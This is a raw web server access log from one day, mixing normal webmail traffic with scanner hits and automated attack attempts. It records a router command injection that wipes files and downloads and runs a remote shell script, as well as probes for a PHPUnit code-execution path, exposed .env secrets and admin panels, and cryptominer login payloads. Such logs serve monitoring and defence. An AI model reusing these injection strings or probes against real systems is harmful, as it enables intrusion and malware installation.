122.161.75.102 - - [15/Apr/2024:11:12:44 +0000] "POST /roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 170 "https://server.mswebtech.com/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
122.161.75.102 - - [15/Apr/2024:11:13:44 +0000] "POST /roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 170 "https://server.mswebtech.com/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
122.161.75.102 - - [15/Apr/2024:11:14:45 +0000] "POST /roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 170 "https://server.mswebtech.com/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
122.161.75.102 - - [15/Apr/2024:11:15:45 +0000] "POST /roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 170 "https://server.mswebtech.com/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
122.161.75.102 - - [15/Apr/2024:11:16:45 +0000] "POST /roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 170 "https://server.mswebtech.com/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
198.46.192.22 - admin [15/Apr/2024:11:23:42 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55"
3.235.89.86 - - [15/Apr/2024:11:24:45 +0000] "GET / HTTP/1.1" 200 5069 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
167.94.138.2 - - [15/Apr/2024:11:35:37 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:11:35:38 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
87.236.176.107 - - [15/Apr/2024:11:46:01 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
69.164.217.245 - - [15/Apr/2024:11:46:21 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
172.105.128.11 - - [15/Apr/2024:11:47:00 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.104.210.105 - - [15/Apr/2024:11:51:55 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
198.74.56.46 - - [15/Apr/2024:11:52:09 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
135.148.100.196 - - [15/Apr/2024:11:53:58 +0000] "GET / HTTP/1.1" 200 5069 "-" "-"
172.105.128.11 - - [15/Apr/2024:12:01:02 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:12:05:38 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:12:05:39 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
165.154.128.17 - - [15/Apr/2024:12:06:01 +0000] "GET / HTTP/1.1" 200 5069 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
165.154.128.17 - - [15/Apr/2024:12:06:20 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
165.154.128.17 - - [15/Apr/2024:12:06:20 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
165.154.128.17 - - [15/Apr/2024:12:06:21 +0000] "GET /sitemap.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
165.154.128.17 - - [15/Apr/2024:12:06:26 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"
185.191.126.213 - - [15/Apr/2024:12:09:32 +0000] "GET / HTTP/1.1" 400 255 "-" "-"
106.75.165.113 - - [15/Apr/2024:12:19:22 +0000] "{\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2245JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV\x22,\x22pass\x22:\x22xxoo\x22,\x22agent\x22:\x22xmr-stak-cpu/1.3.0-1.5.0\x22},\x22id\x22:1}" 400 157 "-" "-"
106.75.165.113 - - [15/Apr/2024:12:19:23 +0000] "{\x22id\x22:1,\x22method\x22:\x22mining.subscribe\x22,\x22params\x22:[]}" 400 157 "-" "-"
106.75.165.113 - - [15/Apr/2024:12:19:24 +0000] "{\x22params\x22: [\x22miner1\x22, \x22password\x22], \x22id\x22: 2, \x22method\x22: \x22mining.authorize\x22}" 400 157 "-" "-"
106.75.165.113 - - [15/Apr/2024:12:19:25 +0000] "{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22blue1\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22Windows NT 6.1; Win64; x64\x22}}" 400 157 "-" "-"
106.75.165.113 - - [15/Apr/2024:12:19:26 +0000] "{\x22params\x22: [\x22miner1\x22, \x22bf\x22, \x2200000001\x22, \x22504e86ed\x22, \x22b2957c02\x22], \x22id\x22: 4, \x22method\x22: \x22mining.submit\x22}" 400 157 "-" "-"
106.75.165.113 - - [15/Apr/2024:12:19:26 +0000] "{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22x\x22,\x22pass\x22:\x22null\x22,\x22agent\x22:\x22XMRig/5.13.1\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/loki\x22,\x22rx/arq\x22,\x22rx/sfx\x22,\x22rx/keva\x22]}}" 400 157 "-" "-"
3.238.190.116 - - [15/Apr/2024:12:34:08 +0000] "GET / HTTP/1.1" 200 5069 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
167.94.138.2 - - [15/Apr/2024:12:35:38 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:12:35:39 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
34.78.68.58 - - [15/Apr/2024:12:46:48 +0000] "GET / HTTP/1.1" 200 1971 "-" "python-requests/2.31.0"
45.79.181.94 - - [15/Apr/2024:12:50:58 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
84.54.51.13 - - [15/Apr/2024:12:53:45 +0000] "POST /login HTTP/1.1" 400 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
80.94.92.60 - - [15/Apr/2024:12:54:38 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
80.94.92.60 - - [15/Apr/2024:12:54:38 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
149.115.239.20 - - [15/Apr/2024:12:57:11 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
71.6.232.24 - - [15/Apr/2024:13:03:19 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:13:05:37 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:13:05:38 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
106.75.166.204 - - [15/Apr/2024:13:06:15 +0000] "{\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2245JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV\x22,\x22pass\x22:\x22xxoo\x22,\x22agent\x22:\x22xmr-stak-cpu/1.3.0-1.5.0\x22},\x22id\x22:1}" 400 157 "-" "-"
207.154.230.7 - - [15/Apr/2024:13:22:04 +0000] "GET / HTTP/1.1" 200 4571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
104.236.75.227 - - [15/Apr/2024:13:24:34 +0000] "GET /_profiler/phpinfo HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
167.94.138.2 - - [15/Apr/2024:13:35:40 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:13:35:40 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
68.183.81.172 - - [15/Apr/2024:13:36:42 +0000] "GET / HTTP/1.1" 200 1976 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
106.75.152.66 - - [15/Apr/2024:13:50:25 +0000] "{\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2245JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV\x22,\x22pass\x22:\x22xxoo\x22,\x22agent\x22:\x22xmr-stak-cpu/1.3.0-1.5.0\x22},\x22id\x22:1}" 400 157 "-" "-"
106.75.152.66 - - [15/Apr/2024:13:50:26 +0000] "{\x22id\x22:1,\x22method\x22:\x22mining.subscribe\x22,\x22params\x22:[]}" 400 157 "-" "-"
106.75.152.66 - - [15/Apr/2024:13:50:27 +0000] "{\x22params\x22: [\x22miner1\x22, \x22password\x22], \x22id\x22: 2, \x22method\x22: \x22mining.authorize\x22}" 400 157 "-" "-"
106.75.152.66 - - [15/Apr/2024:13:50:27 +0000] "{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22blue1\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22Windows NT 6.1; Win64; x64\x22}}" 400 157 "-" "-"
106.75.152.66 - - [15/Apr/2024:13:50:28 +0000] "{\x22params\x22: [\x22miner1\x22, \x22bf\x22, \x2200000001\x22, \x22504e86ed\x22, \x22b2957c02\x22], \x22id\x22: 4, \x22method\x22: \x22mining.submit\x22}" 400 157 "-" "-"
106.75.152.66 - - [15/Apr/2024:13:50:30 +0000] "{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22x\x22,\x22pass\x22:\x22null\x22,\x22agent\x22:\x22XMRig/5.13.1\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/loki\x22,\x22rx/arq\x22,\x22rx/sfx\x22,\x22rx/keva\x22]}}" 400 157 "-" "-"
122.161.75.102 - - [15/Apr/2024:13:52:52 +0000] "POST /roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 197 "https://server.mswebtech.com/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
122.161.75.102 - - [15/Apr/2024:13:52:54 +0000] "GET /roundcube/?_task=mail&_err=session HTTP/1.1" 200 2209 "https://server.mswebtech.com/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
122.161.75.102 - - [15/Apr/2024:13:52:54 +0000] "GET /roundcube/skins/elastic/deps/bootstrap.min.css?s=1612812589 HTTP/1.1" 200 23118 "https://server.mswebtech.com/roundcube/?_task=mail&_err=session" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
122.161.75.102 - - [15/Apr/2024:13:52:55 +0000] "GET /roundcube/plugins/jqueryui/themes/elastic/jquery-ui.css?s=1612812580 HTTP/1.1" 200 8180 "https://server.mswebtech.com/roundcube/?_task=mail&_err=session" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
122.161.75.102 - - [15/Apr/2024:13:52:55 +0000] "GET /roundcube/skins/elastic/styles/styles.min.css?s=1634503084 HTTP/1.1" 200 22236 "https://server.mswebtech.com/roundcube/?_task=mail&_err=session" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
122.161.75.102 - - [15/Apr/2024:13:52:55 +0000] "GET /roundcube/program/js/jstz.min.js?s=1612812585 HTTP/1.1" 200 5038 "https://server.mswebtech.com/roundcube/?_task=mail&_err=session" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
146.190.166.168 - - [15/Apr/2024:13:59:22 +0000] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:23 +0000] "GET /ews/exchanges/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:24 +0000] "GET /ews/exchange%20/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:25 +0000] "GET /ews/exchange/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:26 +0000] "GET /ews/%20/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:27 +0000] "GET /ews/ews/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:28 +0000] "GET /ews/autodiscovers/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:29 +0000] "GET /autodiscover/autodiscovers/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:30 +0000] "GET /autodiscover/autodiscover%20/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:31 +0000] "GET /autodiscover/autodiscoverrs/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
146.190.166.168 - - [15/Apr/2024:13:59:31 +0000] "GET /autodiscove/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
167.94.138.2 - - [15/Apr/2024:14:05:43 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:14:05:44 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
195.140.227.163 - afiiskc [15/Apr/2024:14:06:15 +0000] "GET /manager/html HTTP/1.1" 404 196 "-" "Go-http-client/1.1"
106.75.173.226 - - [15/Apr/2024:14:07:43 +0000] "{\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2245JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV\x22,\x22pass\x22:\x22xxoo\x22,\x22agent\x22:\x22xmr-stak-cpu/1.3.0-1.5.0\x22},\x22id\x22:1}" 400 157 "-" "-"
106.75.173.226 - - [15/Apr/2024:14:07:44 +0000] "{\x22id\x22:1,\x22method\x22:\x22mining.subscribe\x22,\x22params\x22:[]}" 400 157 "-" "-"
106.75.173.226 - - [15/Apr/2024:14:07:45 +0000] "{\x22params\x22: [\x22miner1\x22, \x22password\x22], \x22id\x22: 2, \x22method\x22: \x22mining.authorize\x22}" 400 157 "-" "-"
43.134.79.204 - - [15/Apr/2024:14:15:28 +0000] "GET /cdn-cgi/trace HTTP/1.1" 400 255 "-" "python-requests/2.31.0"
148.153.45.238 - - [15/Apr/2024:14:16:13 +0000] "GET /bm8U HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [15/Apr/2024:14:16:14 +0000] "GET /n1pN HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [15/Apr/2024:14:16:15 +0000] "GET /aab8 HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [15/Apr/2024:14:16:16 +0000] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [15/Apr/2024:14:16:17 +0000] "GET /aab9 HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [15/Apr/2024:14:16:18 +0000] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
60.191.20.210 - - [15/Apr/2024:14:33:52 +0000] "GET / HTTP/1.1" 400 157 "-" "-"
167.94.138.2 - - [15/Apr/2024:14:35:47 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:14:35:48 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
62.210.90.212 - - [15/Apr/2024:14:47:55 +0000] "GET / HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.212 - - [15/Apr/2024:14:47:56 +0000] "GET /favicon.ico HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.212 - - [15/Apr/2024:14:47:56 +0000] "GET /ads.txt HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.212 - - [15/Apr/2024:14:47:57 +0000] "GET /app-ads.txt HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.212 - - [15/Apr/2024:14:47:58 +0000] "GET /sellers.json HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
69.164.217.245 - - [15/Apr/2024:14:59:17 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
62.210.90.211 - - [15/Apr/2024:15:01:34 +0000] "GET / HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.211 - - [15/Apr/2024:15:01:35 +0000] "GET /favicon.ico HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.211 - - [15/Apr/2024:15:01:35 +0000] "GET /ads.txt HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.211 - - [15/Apr/2024:15:01:36 +0000] "GET /app-ads.txt HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
62.210.90.211 - - [15/Apr/2024:15:01:37 +0000] "GET /sellers.json HTTP/1.1" 500 96 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
167.94.138.2 - - [15/Apr/2024:15:05:53 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:15:05:54 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
172.104.11.34 - - [15/Apr/2024:15:32:49 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:15:35:44 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:15:35:45 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
172.104.11.51 - - [15/Apr/2024:15:52:58 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [15/Apr/2024:16:05:51 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:16:05:51 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
45.79.128.205 - - [15/Apr/2024:16:08:17 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.155.88.231 - - [15/Apr/2024:16:08:31 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
80.94.92.105 - - [15/Apr/2024:16:23:01 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
103.114.106.107 - - [15/Apr/2024:16:31:08 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.114.106.107 - - [15/Apr/2024:16:31:09 +0000] "POST / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
80.75.212.75 - - [15/Apr/2024:16:35:38 +0000] "CONNECT www.google.com:443 HTTP/1.1" 400 157 "-" "-"
167.94.138.2 - - [15/Apr/2024:16:35:43 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:16:35:44 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
135.148.100.196 - - [15/Apr/2024:16:44:55 +0000] "GET / HTTP/1.1" 200 5069 "-" "-"
66.249.79.135 - - [15/Apr/2024:16:47:37 +0000] "GET /robots.txt HTTP/1.1" 200 109 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.136 - - [15/Apr/2024:16:47:38 +0000] "GET /weekend-packages.php HTTP/1.1" 200 3601 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.164.217.74 - - [15/Apr/2024:16:49:10 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
45.79.163.53 - - [15/Apr/2024:16:53:07 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
167.94.138.2 - - [15/Apr/2024:17:05:47 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [15/Apr/2024:17:05:48 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
45.79.181.104 - - [15/Apr/2024:17:18:27 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.122.204.242 - - [15/Apr/2024:17:20:29 +0000] "GET /remote/login HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
